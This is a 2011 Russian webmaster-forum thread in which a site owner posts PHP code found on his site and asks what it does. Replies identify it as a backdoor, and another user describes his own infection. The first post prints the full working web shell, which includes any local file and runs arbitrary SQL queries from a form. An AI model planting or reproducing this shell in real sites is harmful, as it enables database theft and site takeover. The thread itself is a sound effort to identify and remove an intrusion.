Нашел у себя зловредный код на сайте.....

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Веб-строительство > Программная часть

Нашел у себя зловредный код на сайте....., Жизнь мне 2 месяца портил....

Опции

ThePixel

Topic Starter сообщение

15.11.2011, 0:06; Ответить: ThePixel

Сообщение #1

Бывалый

Группа: User
Сообщений: 265
Регистрация: 4.3.2011
Из: Москва
Поблагодарили: 29 раз
Репутация:

Прошу Вас рассмотреть данный код и дать понять что он делает:

<?php
session_start();
function s(){
$args = func_get_args();
if(count($args)==1){
if(isset($_SESSION[$args[0]])){
return $_SESSION[$args[0]];
}else{
return false;
}
}elseif(count($args)==2){
$_SESSION[$args[0]] = $args[1];
}
}
function r($arr,$print=true){
$str = '<tr><td>'.implode('</td><td>',$arr).'</td></tr>';
if($print){
print($str);
}else{
return $str;
}
}
if(!empty($_POST['connect'])){
if(file_exists($_POST['connect'])){
s('connect',$_POST['connect']);
}
}
if(s('connect') && file_exists(s('connect'))){
include(s('connect'));
print('included '.s('connect').'<br />');
}else{
print('nofile');
}
if(!empty($_POST['query'])){
mysql_query("SET NAMES utf8");
$sql = stripslashes($_POST['query']);
print($sql.'<br />');
$res = mysql_query($sql);
print(mysql_error());
$i = 0;
?>
<table border="1px" style="border-collapse: collapse; font-size: 0.7em">
<?php
while($row = mysql_fetch_array($res,MYSQL_ASSOC)){

if($i%100 == 0){
r(array_keys($row));
}
r($row);
$i++;
}
?>
</table>
<?php
}else{
$sql = '';
}
?>
<form action="<?=$_SERVER['REQUEST_URI']?>" method="post">
<input type="text" name="connect" /><br />
<textarea name="query" rows="25" cols="80" ><?=$sql?></textarea><br />
<input type="submit">
</form>

Жду комментариев, ох сколько же нервов он мне попортил.

--------------------

Ссылоки, морды, аренда, - тема СМИ: Компьютерные технологии и гаджеты - СуперТраССт
Зарабатываю на САЙТЕ 70 000р/месяц ТуТ!

-1

Ответить с цитированием данного сообщения

kronos kronos 15.11.2011, 0:21; Сообщений: 4703 Поблагодарили: 2633 раза Репутация: 328 Просмотр профиля	15.11.2011, 0:21; Ответить: kronos Сообщение #2
Белый веб-мастер Группа: Active User Сообщений: 4703 Регистрация: 10.2.2009 Из: Харьков Поблагодарили: 2633 раза Репутация: 328	на зловредный не похож -------------------- Вот с чего начинается Сайт Для Людей!

ThePixel Topic Starter ThePixelTopic Starter 15.11.2011, 0:25; Сообщений: 265 Поблагодарили: 29 раз Репутация: 5 Просмотр профиля	Topic Starter 15.11.2011, 0:25; Ответить: ThePixel Сообщение #3
Бывалый Группа: User Сообщений: 265 Регистрация: 4.3.2011 Из: Москва Поблагодарили: 29 раз Репутация: 5	(kronos @ 15.11.2011, 0:21) на зловредный не похож Может и нет но его функционал я не понимаю, у меня весь сайт танцует с БД вместе http://www.saronit.ru/subcategory.php?id=332&bid=38 - вот пример в тексте. и еще раскладка меняется по схожести букв с латиницы на русские... -------------------- Ссылоки, морды, аренда, - тема СМИ: Компьютерные технологии и гаджеты - СуперТраССт Зарабатываю на САЙТЕ 70 000р/месяц ТуТ!

Max_Q Max_Q 15.11.2011, 1:04; Сообщений: 118 Поблагодарили: 46 раз Репутация: 13 Просмотр профиля	15.11.2011, 1:04; Ответить: Max_Q Сообщение #4
Участник Группа: User Сообщений: 118 Регистрация: 13.11.2011 Поблагодарили: 46 раз Репутация: 13	Благодаря этому файлу можно подключать php файлы и выполнять произвольные запросы к базе данных. Так что это действительно "вредный код", благодаря которому можно получить доступ к сайту.

bobgubko bobgubko 15.11.2011, 1:05; Сообщений: 58 Поблагодарили: 20 раз Репутация: 18 Просмотр профиля	15.11.2011, 1:05; Ответить: bobgubko Сообщение #5
Частый гость Группа: User Сообщений: 58 Регистрация: 20.4.2009 Из: Ukraine, Niko Поблагодарили: 20 раз Репутация: 18	Не зловред? Та ладно. На shell похоже. На месте ТС я бы его удалил, если это не часть движка. -------------------- php, js, html, css, python

ThePixel Topic Starter ThePixelTopic Starter 15.11.2011, 1:32; Сообщений: 265 Поблагодарили: 29 раз Репутация: 5 Просмотр профиля	Topic Starter 15.11.2011, 1:32; Ответить: ThePixel Сообщение #6
Бывалый Группа: User Сообщений: 265 Регистрация: 4.3.2011 Из: Москва Поблагодарили: 29 раз Репутация: 5	Max_Q, Вот это оно и есть, у меня интернет магазин просто вешался, когда меняется наименование товара или еще что))) Сообщение отредактировал bum - 2.4.2012, 14:49 Причина редактирования: -overquotting -------------------- Ссылоки, морды, аренда, - тема СМИ: Компьютерные технологии и гаджеты - СуперТраССт Зарабатываю на САЙТЕ 70 000р/месяц ТуТ!

FRUTALITY

15.11.2011, 14:45; Ответить: FRUTALITY

Сообщение #7

Участник

Группа: User
Сообщений: 144
Регистрация: 7.9.2010
Поблагодарили: 39 раз
Репутация:

В каком/каких файлах данный код нашелся?

Дело в том, что сегодня я тоже обнаружил вредоносный код на своих сайтах. Все, что нашел - это появившаяся строка в каждом php файле; файл вида tmp_32795234523.php в корне каждого сайта; 6 файлов такого же вида в корне FTP; а также код в htaccess каждого сайта.

Заподозрил что-то неладное, когда на всех сайтах начался спад посещаемости; случайно увидел, как браузер при открытии моего сайта грузит какую-то информацию с домена turnitupnow.net - проверил сайты, нашел вредоносный код. Но, боюсь, что не весь.

Поэтому повторю вопрос, в каком файле вы нашли этот код? Тоже гляну у себя.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой

или обратитесь к любому из модераторов.

--------------------

Magic 8 ball как в фильме "Трасса 60". Онлайн.
Мой скромный бложе.

« Предыдущая тема · Программная часть · Следующая тема »

1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Быстрый и качественный обмен на сайте Baksman.org Обмен Bitcoin, BTC-e, PM, Qiwi, Yandex money, Карты банк	52	Baksman	33568	Вчера, 5:02 автор: Baksman
Боты могут делать пушподписки на моём сайте?	0	Megaspryt	406	17.4.2024, 23:29 автор: Megaspryt
CryptoCloud — прием USDT, BTC, ETH, LTC на любом сайте	36	CryptoCLoud	10638	16.4.2024, 16:02 автор: CryptoCLoud
Странный трафик на сайте длительное время	33	TABAK	8739	12.4.2024, 5:56 автор: Skyworker
Алтуально ли заработок на сайте? Оцение пожалуйста идею	10	hitman20	1881	1.2.2024, 5:37 автор: Liudmila

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 19.4.2024, 3:16

Дизайн